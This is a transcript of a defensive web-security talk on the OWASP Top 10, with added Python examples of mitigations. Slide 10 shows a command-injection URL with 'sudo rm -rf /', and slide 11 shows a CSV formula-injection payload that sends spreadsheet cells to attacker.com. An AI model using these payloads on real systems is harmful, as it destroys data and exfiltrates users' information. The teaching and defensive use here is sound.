
Let's talk Security

Slides from Engineering Talkies at Wingify

Dheeraj Joshi

April 21, 2016
Transcript

  1. Let’s talk Security
    Understanding, Exploiting and Defending against Top Web Vulnerabilities
    Dheeraj Joshi, djadmin.in

  2. About Me
    I find security vulnerabilities for fun & swag, and I wear a white hat.
    Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean,
    Cloudflare, Intuit, Groupon, etc.
    What makes me happy?

  3. Security - Into The Details
    ● OWASP’s Top 10 Vulnerabilities
    ○ Explain
    ○ Impact
    ○ Defense
    ○ Real examples (External + Internal)
    ● Demo - RCE
    ● Q & A

  4. Why should Startups Care about Security?
    Startups & SMEs are notorious for cutting corners. One of the
    first things they cut is ‘Security’.

  6. HACKER PUTS HOSTING SERVICE CODE SPACES OUT OF BUSINESS
    The Shutdown

  7. OWASP Top 10 And Beyond

  8. INJECTION

  9. PREVENT INJECTION
    ● For databases, use prepared statements
    ● Whitelist inputs wherever possible
    ● Sanitize inputs (use the filter extension)
    ● Don’t trust user input and always verify!

  10. Example
    Google Command Injection
    We can include any command in the URL below
    https://console.cloud.google.com/home/dashboard?project=;sudo rm -rf /
    Found by an Indian Security Researcher (S. Venkatesh)

  11. Exploiting ‘Export as CSV’ functionality
    Formula Injection
    =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information")
    Fix - Prefix cells that start with a formula trigger (=, +, -) with a single quote (')
    If the victim clicks this cell, they inadvertently exfiltrate the contents of
    cells A1 and A2 to the attacker’s website, which may include other users’
    sensitive information.
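
The fix from the slide, as an added example (not code from the deck): every cell written to the export is checked for a leading formula trigger and, if one is found, prefixed with a single quote so the spreadsheet displays it as text. It goes slightly beyond the slide's list of =, + and - by also treating @, tab and carriage return as triggers, which OWASP's CSV injection guidance includes; the sample rows are constructed.

```python
import csv
import io

# Characters spreadsheet applications treat as the start of a formula.
# The slide lists =, + and -; '@', tab and carriage return are added here
# because spreadsheets also evaluate cells that begin with them.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def escape_cell(value):
    """Return a value safe to put in a CSV cell that a spreadsheet will open.

    A cell beginning with a formula trigger is prefixed with a single quote, so
    the spreadsheet shows the literal text instead of evaluating a formula.
    """
    text = "" if value is None else str(value)
    if text.startswith(FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_rows(rows):
    """Write rows to CSV text, escaping every cell before it reaches the writer.

    QUOTE_ALL wraps each field in double quotes, so commas, quotes and newlines
    inside a value cannot break the row structure either.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([escape_cell(cell) for cell in row])
    return buf.getvalue()
```

Apply the escaping at export time rather than at input time: the same value may be perfectly safe in an HTML page and only dangerous once it lands in a spreadsheet, so the encoding belongs to the output context.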

  12. BROKEN AUTHENTICATION AND SESSION MANAGEMENT

  13. MITIGATION
    ● Enforce a strong password policy
    ● Require periodic password resets
    ● Use two-factor authentication
    ● Use SSL and set the Secure flag on cookies
    ● Don’t neglect failed-login detection & tracking
    ● Set the HttpOnly flag on cookies
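
Three of the mitigation bullets in working code, added here and not taken from the deck: a session cookie carrying the Secure and HttpOnly flags (SameSite is added on top of what the slide lists), salted password hashing with a constant-time compare, and a per-account failed-login tracker that locks the account after a burst of failures. The tracker keeps counters in a dict for the example; a shared store would be used in a real deployment, and the clock is injectable so expiry can be tested.

```python
import hashlib
import hmac
import secrets
import time
from http.cookies import SimpleCookie


def session_cookie_header(session_id, max_age=3600):
    """Build the Set-Cookie value for a session cookie.

    Secure:    the browser only sends the cookie over HTTPS.
    HttpOnly:  script running in the page (e.g. an XSS payload) cannot read it.
    SameSite:  not on the slide; stops the cookie riding along on cross-site requests.
    """
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["secure"] = True
    cookie["session"]["httponly"] = True
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    cookie["session"]["max-age"] = max_age
    return cookie["session"].OutputString()


def hash_password(password, salt=None, iterations=200_000):
    # Salted PBKDF2; a fresh random salt is generated when none is supplied.
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password, salt, expected_digest, iterations=200_000):
    _, digest = hash_password(password, salt, iterations)
    # compare_digest avoids leaking how many leading bytes matched.
    return hmac.compare_digest(digest, expected_digest)


class FailedLoginTracker:
    """Count failed logins per account inside a sliding window and lock the
    account once the limit is reached (constructed for this example)."""

    def __init__(self, max_failures=5, window_seconds=900, now=time.time):
        self.max_failures = max_failures
        self.window = window_seconds
        self.now = now
        self._failures = {}  # username -> list of failure timestamps

    def _recent(self, username):
        cutoff = self.now() - self.window
        recent = [t for t in self._failures.get(username, []) if t >= cutoff]
        self._failures[username] = recent
        return recent

    def record_failure(self, username):
        self._recent(username).append(self.now())

    def record_success(self, username):
        self._failures.pop(username, None)

    def is_locked(self, username):
        return len(self._recent(username)) >= self.max_failures


def attempt_login(tracker, username, password, stored):
    """stored is the (salt, digest) pair for the account. Returns True on success.

    A locked account fails even with the right password, so guessing cannot
    continue once the limit is hit; a success clears the counter."""
    if tracker.is_locked(username):
        return False
    if verify_password(password, *stored):
        tracker.record_success(username)
        return True
    tracker.record_failure(username)
    return False
```

Note that the lock is per account, not per source address, so an attacker spreading guesses over many IPs is still stopped; the trade-off is that someone else can lock an account they know the name of, which is why the window is short.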

  14. CROSS SITE SCRIPTING - XSS
    ● XSS attacks users
    ● “JavaScript Injection”
    ● Exploits can be bad, really bad..

  15. What is XSS?
    Typical Reflected XSS

  16. Stored XSS

  17. DOM XSS

  18. Protect Yourself
    ● Use the filter extension to filter inputs
    ● Ensure that outputs are HTML encoded
    ● Don’t reinvent the wheel
    ● Don’t consider any part of the request as being “safe”
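
The "outputs are HTML encoded" bullet, as an added example rather than code from the deck, using only the standard library (the "don't reinvent the wheel" bullet): untrusted values are encoded for the context they land in, element text and attributes with html.escape, a URL path segment with percent-encoding, and data handed to a script block as JSON with the angle brackets escaped. The function and element names are this example's own.

```python
import html
import json
from urllib.parse import quote


def render_comment(author, body):
    """Render untrusted text into an HTML fragment.

    html.escape with quote=True encodes < > & " and ', which covers element
    content and double-quoted attribute values; the same value is used in both
    places here to show that the encoding, not the input filter, stops the breakout.
    """
    safe_author = html.escape(author, quote=True)
    safe_body = html.escape(body, quote=True)
    return '<div class="comment" data-author="{a}"><b>{a}</b>: {b}</div>'.format(
        a=safe_author, b=safe_body
    )


def render_profile_link(user_id):
    """URL context: percent-encode the path segment (safe="" also encodes '/'),
    then HTML-encode the finished attribute value."""
    href = "/users/" + quote(str(user_id), safe="")
    return '<a href="{}">profile</a>'.format(html.escape(href, quote=True))


def embed_in_script(data):
    """JavaScript context: serialise as JSON and replace the characters that
    could close the enclosing <script> element or start an entity. The \\u
    escapes are valid inside a JSON/JS string literal, so the browser still
    sees the original characters when it parses the value."""
    return (
        json.dumps(data)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )
```

The same untrusted string needs a different encoding in each of the three contexts, which is why a single "sanitize on input" pass cannot replace output encoding.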

  19. ngBind attribute
    $sanitize - service in the ngSanitize module
    Sanitizes an HTML string by stripping all potentially dangerous tokens.

  20. INSECURE DIRECT OBJECT REFERENCES

  21. Scenario / Exploit
    1) First, an attacker signs up for an account and requests “forgot password”.
    2) The attacker receives a link:
    https://vimeo.com/forgot_password/[user id]/[token]
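
The defensive side of the scenario above, as an added example (not the site's code): a reset token is stored only as a hash, bound to the user id it was issued for, compared in constant time, single-use and time-limited, so swapping the user id in the link to someone else's does not redeem it. The in-memory store, the injectable clock and the base URL placeholder are assumptions of this example.

```python
import hashlib
import hmac
import secrets
import time


class PasswordResetTokens:
    """Issue and redeem password-reset tokens bound to one user id.

    Constructed store: user_id -> (sha256(token), expires_at). Only the hash
    is kept, so a leaked copy of the table does not contain usable tokens.
    """

    def __init__(self, ttl_seconds=900, now=time.time):
        self.ttl = ttl_seconds
        self.now = now
        self._pending = {}

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).digest()

    def issue(self, user_id):
        # 32 random bytes from the OS CSPRNG; the caller emails this to the user.
        token = secrets.token_urlsafe(32)
        self._pending[user_id] = (self._digest(token), self.now() + self.ttl)
        return token

    def redeem(self, user_id, token):
        """True only if a token is pending for this user id, it has not
        expired, and it matches; the token is consumed on success."""
        entry = self._pending.get(user_id)
        if entry is None:
            return False
        stored_digest, expires_at = entry
        if self.now() > expires_at:
            del self._pending[user_id]
            return False
        if not hmac.compare_digest(stored_digest, self._digest(token)):
            return False
        del self._pending[user_id]  # single use
        return True


def build_reset_link(base_url, user_id, token):
    # Same shape as the link on the slide; base_url is whatever the site uses.
    return "{}/forgot_password/{}/{}".format(base_url, user_id, token)
```

The lookup is keyed by the user id from the URL, so the check "does this token belong to this user" happens before any comparison; that is the access control the IDOR slide is about, applied to a token rather than a database row.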

  22. Prevention
    ● Low-level access controls
    ● Prevent user input in file/URL access commands
    ● No unsanitized input to execution commands

  23. SECURITY MISCONFIGURATION

  24. PREVENTION > CURE
    ● Perform periodic security checks using automated tools
    ● Static Code Analysis
    ● Example : Hardening MySQL, Directory Listing, Auth Tokens

  25. SENSITIVE DATA EXPOSURE
    ● Exposed PHP error messages
    ● Unencrypted sensitive data storage
    ● Not using SSL
    ● Example: a sensitive token should not be sent to external websites (Fitbit)

  26. MISSING FUNCTION LEVEL ACCESS CONTROL
    ● Valid input processing without access controls
    ● Decentralized access control layer
    ● Example : Profile email address not validated (Github), S3 configuration

  27. CROSS-SITE REQUEST FORGERY (CSRF)
    ● Don’t perform data changes on GET
    ● Use secure (CSRF) tokens for POST
    ● Impact : Real bad, attacks users
    ● Example : Dropbox, CodeSchool
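
The two CSRF bullets in code, added here and not from the deck: a state-changing endpoint refuses GET outright and accepts POST only with a token derived from the caller's own session by HMAC, so a token captured from one session is useless in another and nothing has to be stored server-side. The dispatcher, the server secret and the "delete account" action are this example's assumptions.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; a real service loads it from configuration
# so it survives restarts and is shared across instances.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token_for(session_id):
    """Derive the CSRF token for a session with HMAC-SHA256.

    The token can be recomputed on every request, and because it is keyed by
    the session id it does not validate for any other session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id, submitted_token):
    if not submitted_token:
        return False
    return hmac.compare_digest(csrf_token_for(session_id), submitted_token)


def handle_request(method, session_id, form):
    """Minimal dispatcher for a state-changing endpoint such as 'delete account'.

    Returns (status, message). GET never changes data, which stops <img src=...>
    style forgeries; POST is accepted only with the caller's own token."""
    if method == "GET":
        return 405, "state changes are not allowed on GET"
    if method != "POST":
        return 405, "method not allowed"
    if not csrf_token_valid(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, "account deleted"
```

The token is placed in a hidden form field on the page that renders the form; a cross-site page cannot read that field because the same-origin policy blocks it from reading the response, which is what makes the check effective.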

  28. USING COMPONENTS WITH KNOWN VULNERABILITIES
    ● Not keeping libraries up-to-date
    ● *cough*WordPress*cough*
    ● Example : Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE)

  29. UNVALIDATED REDIRECTS AND FORWARDS
    ● Header Injection
    ● JavaScript Parameter Injection
    ● Reliance on HTTP_REFERER
    ● Abuse of window.opener (Facebook)
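
A validator for a redirect target, as an added example (not from the deck or from Dropbox's API): it accepts only same-site relative paths or absolute URLs on an allowlisted host and falls back to a default for everything else, including the shapes that commonly slip past naive checks (scheme-relative //host, backslash variants, userinfo tricks, non-http schemes) and CR/LF characters, which covers the "Header Injection" bullet. The host allowlist is constructed.

```python
from urllib.parse import urlparse

# Constructed allowlist of hosts this application may redirect to.
ALLOWED_HOSTS = {"example.com", "app.example.com"}


def safe_redirect_target(next_url, default="/"):
    """Return next_url if it stays on this site, otherwise default.

    Checks, in order:
      1. empty or CR/LF-bearing values (CR/LF in a Location header is header injection)
      2. backslashes, which browsers treat like forward slashes
      3. a plain relative path ('/dashboard') is fine; '//host' is not
      4. absolute URLs must be http(s) on an allowlisted host
    """
    if not next_url:
        return default
    if "\r" in next_url or "\n" in next_url:
        return default
    candidate = next_url.replace("\\", "/")
    parsed = urlparse(candidate)
    if not parsed.scheme and not parsed.netloc:
        # Relative reference; must start with exactly one slash.
        if candidate.startswith("//"):
            return default
        return candidate if candidate.startswith("/") else default
    if parsed.scheme not in ("http", "https"):
        return default
    # hostname strips userinfo and port, so 'example.com@evil.com' yields evil.com.
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return default
    return candidate
```

The window.opener bullet is a different mechanism: a page opened via a link with target="_blank" can navigate its opener unless the link carries rel="noopener", which is an HTML-side fix rather than a redirect check.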

  30. Example : Dropbox Open Redirect in v1 API

  31. Remote Code Execution

  32. The solution
    ● Reset all passwords and keys
    ● Remove backdoors (not easy)
    OR
    Destroy everything??

  33. Thank you
    References :
    ● https://www.owasp.org
    ● https://djadmin.in/pwn/ (tools)